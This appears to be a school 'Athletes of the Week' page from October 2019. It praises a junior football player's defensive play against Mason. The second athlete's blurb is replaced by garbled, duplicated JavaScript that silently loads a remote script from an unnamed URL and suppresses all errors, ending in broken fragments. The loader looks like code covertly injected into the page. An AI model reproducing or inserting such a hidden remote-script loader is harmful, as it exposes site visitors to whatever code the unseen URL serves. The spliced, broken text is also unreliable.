Athletes of the Week
Kemba Credit Union Athletes of the Week 10/7/2019-10/13/2019
Aneesh Vyas
Junior, Football
Aneesh was part of a balanced effort but his play on the defensive line spearheaded the Lakota West victory at Mason on Friday. Aneesh led the push into the Comet backfield which held Mason’s total offense to only 127 yards, spread over 29 minutes. He personally contributed four tackles and a quarterback sack.
Sydney Jones
Junior, Soccer
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();